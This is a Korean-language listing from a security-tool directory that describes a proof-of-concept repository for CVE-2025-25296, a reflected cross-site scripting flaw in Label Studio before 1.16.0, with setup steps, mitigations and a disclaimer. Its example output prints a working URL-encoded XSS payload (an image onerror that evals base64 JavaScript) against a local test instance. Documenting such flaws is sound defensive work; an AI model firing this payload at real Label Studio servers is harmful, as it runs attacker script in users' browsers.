Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/math-x-io/cve-2025-25296
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & Education
GitHubmath-x-io/cve-2025-25296

CVE-2025-25296

Proof of Concept (POC) for the CVE-2025-25296 vulnerability affecting Label Studio versions prior to 1.16.0

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-25296 개념 증명(POC)

설명

이 프로젝트는 오픈소스 데이터 라벨링 도구인 Label Studio에 영향을 미치는 CVE-2025-25296 취약점에 대한 개념 증명(POC)을 시연합니다. 해당 취약점은 /projects/upload-example 엔드포인트에 존재하며, GET 요청에서 사용자가 제공한 HTML 콘텐츠를 정화(샌니타이즈)하지 못합니다. 이로 인해 공격자가 피해자의 브라우저에서 임의의 JavaScript를 실행할 수 있으며, 잠재적인 크로스사이트 스크립팅(XSS) 공격으로 이어질 수 있습니다.

취약점 세부 정보

  • 영향받는 구성 요소: Label Studio의 /projects/upload-example 엔드포인트
  • 영향: 크로스사이트 스크립팅(XSS)
  • 근본 원인: GET 요청에서 사용자가 제공한 HTML 콘텐츠에 대한 부적절한 정화(샌니타이즈)
  • 악용 방법: JavaScript가 내장된 특수 형식의 XML 레이블 구성이 포함된 악성 URL 제작
  • 완화 조치: Label Studio를 1.16.0 이상 버전으로 업데이트

임시 해결 방법

임시 해결 방법으로는:

  1. GET 요청과 함께 /projects/upload-example 엔드포인트를 사용하지 마십시오.
  2. 구성을 업로드할 때는 POST 요청을 사용하십시오.

요구 사항

  • Python 3.x
  • Docker
  • 필수 Python 패키지(setup.sh를 사용하여 pip로 설치)

파일

  • poc.py: 취약점을 악용하고 XSS 공격을 시연하는 Python 스크립트.
  • setup.sh: Docker를 사용하여 취약한 환경을 설정하는 스크립트.

설치 지침

  1. 이 저장소를 클론합니다:

    root@kitploit:~
    git clone CVE-2025-25296-POC
    cd CVE-2025-25296-POC
    
  2. 설정 스크립트를 실행합니다:

    root@kitploit:~
    chmod +x setup.sh
    ./setup.sh
    
  3. 설정 스크립트는 다음을 수행합니다:

    • Docker 설치 여부를 확인합니다.
    • 필수 Python 패키지를 설치합니다.
    • 취약한 Label Studio Docker 이미지(1.15.0)를 가져옵니다.
    • 취약한 Label Studio 인스턴스를 localhost:8080에서 실행합니다.
    • http://localhost:8080에서 계정을 생성합니다.

악용

  1. 악용 스크립트를 실행합니다:

    root@kitploit:~
    python poc.py
    
  2. 스크립트는 다음을 수행합니다:

    • 취약한 /projects/upload-example 엔드포인트에 제작된 GET 요청을 전송합니다.
    • 페이로드가 포함된 URL을 출력합니다.
  3. 제공된 URL을 웹 브라우저에서 열어 페이로드에 의해 트리거된 XSS 알림을 확인합니다.

예시 출력

root@kitploit:~
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E

완화 권장 사항

이 취약점을 완화하려면:

  1. Label Studio를 1.16.0 이상 버전으로 업데이트하십시오.
  2. 스크립트 실행을 차단하도록 엄격한 콘텐츠 보안 정책(CSP)을 활성화하십시오.

면책 조항

이 프로젝트는 교육 및 연구 목적으로만 제공됩니다. 책임감 있게 사용하고 명시적 권한이 있는 시스템에서만 사용하십시오. 이 도구의 무단 사용은 관련 법률을 위반할 수 있습니다.

참고 자료

  • Label Studio GitHub 저장소
  • CVE-2025-25296 세부 정보
도구 다운로드